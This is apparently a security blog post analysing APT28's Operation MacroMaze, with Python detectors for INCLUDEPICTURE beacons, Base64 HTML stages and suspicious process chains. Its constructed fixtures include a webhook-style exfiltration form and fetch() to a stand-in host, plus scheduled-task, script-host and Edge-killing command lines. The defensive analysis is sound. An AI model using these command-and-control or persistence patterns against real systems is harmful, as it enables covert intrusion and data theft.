APT28 MacroMaze operation shows that simple can be more dangerous than complex

Published · 5 min read

Between late 2024 and early 2025, security researchers detected a renewed campaign attributed to the group known as APT28, also identified in the literature as Fancy Bear or Strontium. S2 Group's LAB52 intelligence team named the operation Operation MacroMaze and described it as an example of how sophisticated actors can achieve their objectives with surprisingly simple tools and legitimate services as supporting infrastructure. The LAB52 technical report is available on their official blog: Operation MacroMaze - LAB52.

The point of entry was targeted and carefully prepared: documents which, when opened, triggered an automatic sequence to verify that the recipient had interacted with the file. For this the attackers took advantage of a common field in Word documents, INCLUDEPICTURE, which instructs the word processor to fetch an image from a remote URL. By pointing that field at a public request-capture (webhook) service, the adversaries received an HTTP request the moment the file was opened and, with that single call, confirmed that the lure had worked. The mechanism is the same as the well-known "tracking pixel" of digital marketing: an external request that reveals that an item was opened and carries metadata useful to the attacker, such as the source IP, User-Agent and time of the request. The technique is explained well in guides on tracking pixels such as Cloudflare's.
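An added example, not code from LAB52 or from the original article: a small Python triage script that opens a .docx as the ZIP container it is, reassembles Word field codes from the document XML (complex fields split their instruction text across several runs) and flags any INCLUDEPICTURE field whose target is a remote URL or a UNC path, i.e. one that would cause an outbound fetch on open. The sample document, the hook path and the host example.invalid are constructed for the demonstration.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
FLDCHAR = f"{{{W_NS}}}fldChar"
INSTR = f"{{{W_NS}}}instrText"
FLD_SIMPLE = f"{{{W_NS}}}fldSimple"

# Field code of interest: INCLUDEPICTURE "<target>" [switches]
INCLUDEPICTURE_RE = re.compile(r'INCLUDEPICTURE\s+"?([^"\s]+)"?', re.IGNORECASE)
# Targets that leave the machine: URL schemes or a UNC share.
REMOTE_RE = re.compile(r"^(?:https?|ftp|file)://|^\\\\", re.IGNORECASE)


def extract_field_codes(docx_bytes: bytes):
    """Collect every field code in the word/*.xml parts of a .docx.

    Complex fields are stored as fldChar(begin) ... instrText runs ... fldChar(separate|end),
    and the instruction text is often split across several runs, so the runs are joined.
    Simple fields keep the code in the w:instr attribute of w:fldSimple.
    """
    codes = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            buf, in_field = [], False
            for el in root.iter():
                if el.tag == FLDCHAR:
                    kind = el.get(f"{{{W_NS}}}fldCharType")
                    if kind == "begin":
                        buf, in_field = [], True
                    elif kind in ("separate", "end") and in_field:
                        codes.append("".join(buf).strip())
                        in_field = False
                elif el.tag == INSTR and in_field:
                    buf.append(el.text or "")
                elif el.tag == FLD_SIMPLE:
                    codes.append(el.get(f"{{{W_NS}}}instr", "").strip())
    return codes


def find_remote_includepicture(docx_bytes: bytes):
    """Return the targets of INCLUDEPICTURE fields that would trigger an outbound request on open."""
    hits = []
    for code in extract_field_codes(docx_bytes):
        m = INCLUDEPICTURE_RE.search(code)
        if m and REMOTE_RE.match(m.group(1)):
            hits.append(m.group(1))
    return hits


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal .docx (example data, not a real lure) with one complex
    INCLUDEPICTURE field whose instruction text is split across two runs."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">"{target}" \\d </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_docx("https://example.invalid/hook/e7c2")
    print(find_remote_includepicture(lure))
```

Run against a mail gateway's quarantine or a sandbox's dropped files, the same function works on .dotx/.docm containers; the regex deliberately stops at the first whitespace so trailing switches such as \d (do not store the picture in the document) are not mistaken for part of the URL.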


Once the interaction was confirmed, the documents acted as droppers: they carried macros designed to run additional stages that established persistence and downloaded later-stage payloads. LAB52 observed small variations in these macros over the months analyzed, but the logic stayed the same: run a VBScript, which launches a CMD file that creates scheduled tasks and fires a batch file. That chain of small utilities (VBScript, CMD and batch) orchestrated the execution of a Base64-encoded HTML payload that was rendered by Microsoft Edge.

The most operationally ingenious part was the use of the browser as the control and exfiltration channel. In one of the variants, the decoded HTML was run in headless mode or in a window moved off-screen, so as not to attract the user's attention. The rendered content contacted an attacker-controlled endpoint to obtain instructions, executed the received commands on the compromised machine, captured the output and sent it back as an HTML file submitted through a form to the same kind of webhook service. In other words, standard HTML form functionality drove data out to an external service, minimising persistent traces on disk. The technique maps to the web-service exfiltration patterns catalogued in the MITRE ATT&CK framework: T1567 - Exfiltration Over Web Service.
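As an added example (not LAB52's code and not taken from the samples they analysed), a Python triage helper for the staged file described above: it decodes a Base64 blob back into HTML and lists every outbound sink the page can use, form actions, fetch() and XMLHttpRequest calls, sendBeacon() and resource loads, separating the ones that can carry command output out of the machine from those that merely load content. The sample HTML, the hook path and the hosts example.invalid and cdn.example.invalid are constructed; a real webhook endpoint would appear in their place.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Places in a page where a browser can push data to a remote host.
URL_SINKS = [
    ("form_action", re.compile(r'<form\b[^>]*\baction\s*=\s*["\']([^"\']+)["\']', re.I)),
    ("fetch", re.compile(r'\bfetch\s*\(\s*["\']([^"\']+)["\']', re.I)),
    ("xhr_open", re.compile(r'\.open\s*\(\s*["\'][a-z]+["\']\s*,\s*["\']([^"\']+)["\']', re.I)),
    ("send_beacon", re.compile(r'\bsendBeacon\s*\(\s*["\']([^"\']+)["\']', re.I)),
    ("resource_src", re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)),
]
# Sinks that send request bodies or query strings, i.e. can carry command output.
EXFIL_SINKS = {"form_action", "fetch", "xhr_open", "send_beacon"}


def decode_stage(blob: str) -> str:
    """Decode the Base64 text dropped by the scripts (whitespace tolerated, padding repaired)."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)
    try:
        raw = base64.b64decode(compact, validate=True)
    except binascii.Error as exc:
        raise ValueError("blob is not valid Base64") from exc
    return raw.decode("utf-8", errors="replace")


def extract_endpoints(html: str):
    """Return (sink_kind, url) for every absolute http(s) URL found in a known sink."""
    found = []
    for kind, rx in URL_SINKS:
        for url in rx.findall(html):
            if urlparse(url).scheme in ("http", "https"):
                found.append((kind, url))
    return found


def triage_stage(blob: str, trusted_hosts=frozenset()):
    """Decode a staged HTML payload and group the external hosts it can talk to.

    Anything in EXFIL_SINKS pointing at an untrusted host is the exfiltration signal
    described in the text; other sinks are reported separately as content loads.
    """
    report = {"exfil": [], "loads": []}
    for kind, url in extract_endpoints(decode_stage(blob)):
        host = (urlparse(url).hostname or "").lower()
        if host in trusted_hosts:
            continue
        report["exfil" if kind in EXFIL_SINKS else "loads"].append((kind, host))
    return report


# Constructed stage (example data): a POST form for the output plus a polling fetch(),
# both to a webhook-style host, and one ordinary image load for contrast.
SAMPLE_HTML = """<html><body>
<form id="out" method="post" action="https://example.invalid/hook/e7c2">
  <textarea name="output"></textarea>
</form>
<img src="https://cdn.example.invalid/spacer.gif">
<script>
  fetch("https://example.invalid/hook/e7c2?poll=1").then(r => r.text());
</script>
</body></html>"""
SAMPLE_BLOB = base64.b64encode(SAMPLE_HTML.encode()).decode()

if __name__ == "__main__":
    print(triage_stage(SAMPLE_BLOB))
```

Static extraction like this will miss URLs assembled at run time by obfuscated JavaScript, so it is a first pass for the analyst; the hosts it does surface are the ones to feed into the outbound-request monitoring the article recommends.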

LAB52 documented a tactical evolution in the scripts: early versions relied on headless execution of the browser, while later variants resorted to keyboard simulation (SendKeys) and tricks to dismiss dialog windows and security warnings. They also recorded attempts to control the execution environment by killing Edge processes so that the malicious session had exclusive use of the browser. In short, this was not an attempt to introduce complex malware, but to channel native utilities and public services into a low-profile operation.

The technical and strategic lesson is clear: sophistication does not always lie in advanced tools but in the design of the attack flow. The combination of Office macros, simple scripts, a modern browser as the execution engine and third-party services to carry telemetry and exfiltration (all legitimate elements in themselves) lets an attacker build a chain that is very hard to detect unless the right signals are monitored. Groups such as APT28 also have a proven record of operations against political targets and organisations in Europe, documented by analysts and the intelligence community; reference information on the group is available in its MITRE ATT&CK entry: APT28 - MITRE.


What can organisations do to reduce the risk of such campaigns? Prevention means limiting the automatic execution of active content in documents, disabling macros by default except in controlled scenarios, setting policies that prevent Office applications from spawning external processes, and monitoring unusual outbound requests to the third-party services that attackers use as relays. It is equally important to deploy behavioural detection on endpoints to identify patterns such as the creation of unexpected scheduled tasks, Edge being launched by unusual parent processes, or the generation of temporary HTML files with encoded content. To better understand the adversary's capabilities and techniques, community repositories and technical publications are a good starting point, in addition to the LAB52 report already mentioned.
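An added example, not from the report: a small Python detector that encodes the behaviours listed above together with the chain described earlier (script host spawned by Office, schtasks /create, Edge driven by a script, and the later variants' habit of killing Edge). It runs over constructed endpoint telemetry in a simplified shape (process-creation and network events as dictionaries, not any vendor's real schema). The sample events, paths, PIDs and the host example.invalid are all constructed; the Edge command-line flags treated as "hidden rendering" are an assumption of the example, and the last event is a benign Edge launch included as a control.

```python
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
# Flags taken here as a sign the browser is meant to stay out of sight (assumption for the example).
EDGE_QUIET_FLAGS = ("--headless", "--window-position=-")
# An HTML file under a Temp directory, in either path or file:// URL form.
TEMP_HTML_RE = re.compile(r"[\\/]temp[\\/]\S+\.html?\b")


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestor_images(event, by_pid):
    """Yield the image names of every ancestor, walking ppid links (loop-safe)."""
    seen, cur = set(), by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield image_name(cur["image"])
        cur = by_pid.get(cur["ppid"])


def detect_macromaze_chain(events, watch_hosts):
    """Return (rule, pid) alerts for the behaviours of the chain described in the text."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        if e["type"] == "process":
            img, cmd = image_name(e["image"]), e["cmdline"].lower()
            parent = by_pid.get(e["ppid"])
            pimg = image_name(parent["image"]) if parent else ""
            lineage = set(ancestor_images(e, by_pid))
            if pimg in OFFICE_APPS and img in SCRIPT_HOSTS:
                alerts.append(("office_spawns_script_host", e["pid"]))
            if img == "schtasks.exe" and "/create" in cmd and lineage & OFFICE_APPS:
                alerts.append(("scheduled_task_from_office_lineage", e["pid"]))
            if img == "msedge.exe" and (pimg in SCRIPT_HOSTS or any(f in cmd for f in EDGE_QUIET_FLAGS)):
                alerts.append(("edge_launched_by_script_or_hidden", e["pid"]))
            if img == "msedge.exe" and TEMP_HTML_RE.search(cmd):
                alerts.append(("edge_renders_temp_html", e["pid"]))
            if img == "taskkill.exe" and "msedge" in cmd and pimg in SCRIPT_HOSTS:
                alerts.append(("script_kills_edge", e["pid"]))
        elif e["type"] == "network":
            src = by_pid.get(e["pid"])
            src_img = image_name(src["image"]) if src else ""
            if e["host"].lower() in watch_hosts and (src_img in (OFFICE_APPS | SCRIPT_HOSTS) or src_img == "msedge.exe"):
                alerts.append(("request_capture_service_contacted", e["pid"]))
    return alerts


# Constructed telemetry (not real EDR data): the whole chain, then one benign Edge launch.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invitation.docx"},
    {"type": "network", "pid": 100, "host": "example.invalid"},  # INCLUDEPICTURE beacon on open
    {"type": "process", "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\s.vbs"},
    {"type": "process", "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\r.cmd"},
    {"type": "process", "pid": 400, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /sc minute /mo 30 /tn Upd /tr C:\Users\u\AppData\Local\Temp\r.bat"},
    {"type": "process", "pid": 500, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\r.bat"},
    {"type": "process", "pid": 600, "ppid": 500, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": "msedge.exe --headless file:///C:/Users/u/AppData/Local/Temp/stage.html"},
    {"type": "network", "pid": 600, "host": "example.invalid"},  # browser-driven C2 / exfil
    {"type": "process", "pid": 700, "ppid": 500, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill.exe /F /IM msedge.exe"},
    {"type": "process", "pid": 800, "ppid": 1, "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": "msedge.exe https://intranet.example/"},  # benign control, must not alert
]

if __name__ == "__main__":
    for rule, pid in detect_macromaze_chain(SAMPLE_EVENTS, {"example.invalid"}):
        print(f"{rule:40s} pid={pid}")
```

The rules are intentionally individually noisy (an administrator can legitimately create a scheduled task from cmd.exe); their value comes from correlating them on one host within a short window, which is what the lineage check starts to do by tying each event back to the Office process that opened the document.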

Operation MacroMaze shows that basic security hygiene remains decisive: restricting macros, applying network segmentation, logging and analysing outbound requests and training users to spot spear-phishing are not glamorous measures, but they are the most effective against campaigns built on social engineering and the reuse of legitimate services. To learn more about how fields such as INCLUDEPICTURE are used in Microsoft documents, the official documentation on the Word API and fields is useful: INCLUDEPICTURE - Microsoft Docs.

In short, the threat keeps evolving and relies on operational creativity rather than technical complexity. That is a signal for administrators and security leads: monitoring the humblest parts of the environment, a document, a small script or an HTTP call to a public service, can make the difference between detecting an intrusion in time and losing control of a critical system.
